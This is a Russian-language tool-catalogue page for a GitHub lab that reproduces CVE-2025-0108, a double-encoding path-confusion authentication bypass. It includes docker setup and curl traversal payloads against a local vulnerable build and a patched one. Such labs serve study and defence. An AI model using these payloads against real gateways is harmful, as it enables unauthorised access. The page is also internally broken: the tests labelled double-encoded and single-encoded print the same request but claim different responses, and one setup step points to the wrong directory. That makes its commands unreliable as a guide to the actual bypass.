Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-0108 — Воспроизводит уязвимость путаницы путей CVE-2025-0108 в стеках Nginx/Apache. Включает уязвимый PoC и исправленную реализацию, демонстрирующую серверную защиту от обхода аутентификации с двойным кодированием. | Kitploit
Инструменты/GitHubGitHub/kso4more/cve-2025-0108
Анализ уязвимостейЭксплуатация веб-приложенийАутентификацияНеправильная КонфигурацияОбучение и ОбразованиеЛаборатории и Практика
GitHubkso4more/cve-2025-0108

CVE-2025-0108

Воспроизводит уязвимость путаницы путей CVE-2025-0108 в стеках Nginx/Apache. Включает уязвимый PoC и исправленную реализацию, демонстрирующую серверную защиту от обхода аутентификации с двойным кодированием.

Репозиторий
255 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-0108 — Веб-безопасность (PoC & Исправление)

Этот репозиторий содержит небольшую лабораторную среду для воспроизведения и устранения проблемы CVE-2025-0108 (путаница путей / контрабанда заголовков между Nginx и Apache).
Цель задания — продемонстрировать, как дважды закодированные запросы могут обходить аутентификацию в многоуровневом стеке (Nginx -> Flask бэкенд -> Apache/PHP) и показать смягчение на стороне бэкенда.

Эта среда предназначена только для образовательных целей.

Содержание

  • CVE-2025-0108/ — уязвимая реализация (PoC)
  • CVE-2025-0108_fix/ — исправленная реализация (бэкенд проверяет декодированный путь)

PoC (уязвимая) — CVE-2025-0108

Назначение

Смоделировать уязвимую конфигурацию, где дважды закодированный путь может обойти аутентификацию из-за непоследовательного декодирования путей между слоями.

Запуск среды

Из каталога CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

Тесты

Выполните следующие команды curl с вашего хоста:

Тест 1 — дважды закодированный (ожидается: HTTP 200)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Тест 2 — однократно закодированный (ожидается: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Тест 3 — сырой путь с .. (ожидается: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

Остановка сред:

root@kitploit:~
docker compose down

Исправленная версия — CVE-2025-0108_fix

Бэкенд выполняет дополнительную проверку декодированного пути перед разрешением доступа. Это предотвращает обход аутентификации при дважды закодированных запросах.

Из каталога CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

Тесты

Выполните следующие команды curl с вашего хоста:

Из каталога CVE-2025-0108_fix:

root@kitploit:~
cd CVE-2025-0108_fix
docker compose up --build

Тест 1 — дважды закодированный (ожидается: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Тест 2 — однократно закодированный (ожидается: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Тест 3 — сырой путь с .. (ожидается: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

Остановка сред:

root@kitploit:~
docker compose down
Скачать инструмент